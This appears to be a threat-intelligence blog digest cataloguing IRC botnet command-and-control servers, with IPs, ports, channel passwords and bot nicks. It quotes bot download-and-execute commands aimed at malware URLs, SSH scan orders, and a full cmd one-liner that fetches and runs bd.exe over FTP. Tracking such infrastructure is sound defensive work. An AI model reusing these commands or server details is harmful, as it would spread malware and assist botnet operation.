Thanks to this guy for the sample Resolved : [t7v4d.com] To [108.170.24.42] Server: t7v4d.com:4040 Now talking in ##tntTopic is ‘!np hxxp://3rbcool.net/g1.exe DF37A37D9E33FB9904235855863AA5D5 -r’ hosting infos: http://whois.domaintools.com/108.170.24.42
95.86.207.142(irc botnet hosted in Russian Federation Yaroslavl’ Ojsc Rostelecom Yaroslavl Branch)
Server:95.86.207.142 1866 Channel:#!x! hosting infos: http://whois.domaintools.com/95.86.207.142
122.195.244.35(irc botnet hosted in China Nanjing Huaianwangtongdizhichi Huaian Jiangsu Province)
Server:122.195.244.35:8888 Now talking in #!x!Topic:Topic: Set by [Yuri (unknown address)] at (Thu May 16 09:59:25 2013) other channels: Now talking in #1Topic On: [#1 ] [ !NAZEL hxxp://146.185.246.190/7384IEP.da !NAZEL hxxps://hotfile.com/dl/223005198/7893880/g.exe ]Topic By: [ p81 ] Now talking in #2Topic On: [ #2 ] [!NAZELturbo hxxp://146.185.246.190/7384IEP.da udos.exe | !NAZEL hxxps://hotfile.com/dl/223005198/7893880/g.exe yufck.exe ]Topic By: [ p81 ]Read more...
teamirc.sytes.net(irc botnet hosted in Russian Federation Moscow Broadband Internet Access For Customers Rostelecom)
Resolved : [teamirc.sytes.net] To [188.254.47.158] Server:188.254.47.158:6667Nick: [A|W_XP|1]pfmxdUsername: 20173Joined Channel: #Mirc#Channel Topic for Channel #MirC#: “!dlexec hxxp://46.254.16.170/7.exe” hosting infos: http://whois.domaintools.com/188.254.47.158
irc.e-qacs.com(irc botnet hosted in Denmark Glostrup Nianet A/s)
Resolved : [irc.e-qacs.com] To [130.185.133.134] Server: irc.e-qacs.com:8782 Now talking in #sshscan2 Topic On: [ #sshscan2 ] [ .scan sshgodscan 100 0 0 x.x.x.x -r -n ] Topic By: [ {00-RUS-VISTA-WIN ] found by x00 hosting infos: http://whois.domaintools.com/130.185.133.134
vhost.bounceme.net(irc botnet hosted in France Paris Nerim Sas)
Resolved : [vhost.bounceme.net] To [194.242.114.177] Server: 194.242.114.177:6667 Server Password: Username: Pmx Nickname: aKH-4mins Channel: #sys# (Password: ) Channeltopic: same guy diferent domain: scan.no-ip.org 194.242.114.177 Server: 194.242.114.177:6667 Server Password: Username: skjcxmot Nickname: [nLh-VNC]otkfck Channel: sex (Password: ) Channel: #bot Channeltopic: Credits to x00 for samples:-) Hosting infos: http://whois.domaintools.com/194.242.114.177
were.hacked.jp(irc botnet hosted in France Roubaix Ovh Systems)
Thanks to anonymous guy in this post for the sample Resolved : [were.hacked.jp] To [176.31.123.56] Server: 176.31.123.56:8782Server Password:Username: __x00Nickname: {x00-00-DEU-XP-DELL-9640}Channel: ###x00### (Password: )Channeltopic: :.ban |.scan sshspreadscan 120 7 0 41.x.x.x sample here hosting infos: http://whois.domaintools.com/176.31.123.56
h.opennews.su (irc botnet hosted by qhoster.com)
Resolved h.opennews.su to 5.45.181.254 Server: h.opennews.su Port: 9000 Channel: #sp Channel password: yop Topic for #sp is: !wB/smZJsKbDADvo5ab8sIF/r5RP7kkXfEsreBMH+9hiVs3ilngzFHh0Ph9sbgtC/EeqYw5x0Vj2IqRyb/knFS+LUzo6bf3cW/A1SyUXkVxz8ERDPS2K/qHObIS3TFyR2JAiWdnWc82S3KnAwUHQFMEb6h/kQqB9TcZElsKS4BnyDiGp1B19crjVgBes7+ilkHVmFLRRgoSPyUBx71ioiUporVdeOIEUhA547CIbp0odHxRQ41LK9wPz13N8KYZx6/QE//rZhBqCorPJqg3w= Topic for #sp set by SNK at Thu Apr 04 06:16:09 2013 Example bot nick: n{USA-XPx86u}gjekbowg Alternate domains: f.eastmoon.pl gigasbh.org gigasphere.su o.dailyradio.su photobeat.su s.richlab.pl uranus.kei.su xixbh.com xixbh.net You may recognize some of the domains from previous postsRead more...
priv8.blackunix.com(irc botnet hosted in United States Seattle The Endurance International Group Inc.)
Resolved : [priv8.blackunix.com] To [209.59.209.111] Server: 209.59.209.111:5545 Server Password: ownz Username: xcembmbr Nickname: priv88qPCdHIIQo The botnet spreads via ftp : cmd /c echo open pasalles.no-ip.org 21 >> ik &echo user kurt kurt >> ik &echo binary >> ik &echo get bd.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &bd.exe &exitRead more...
199.229.249.189(irc botnet hosted in United States Atlanta Colo At 55 Llc)
Remote Host Port Number 199.229.249.189 443 Local users: 131 4000 Current local users 131, max 4000 Global users: 140 4010 Current global users 140, max 4010 USER zwin- 127.0.0.1 localhost :Operation Dildos NICK zwin-WHDKCF|1837| JOIN #test : JOIN #test3 :god NICK zwin-TIGYPT|1952| Hosting infos: http://whois.domaintools.com/199.229.249.189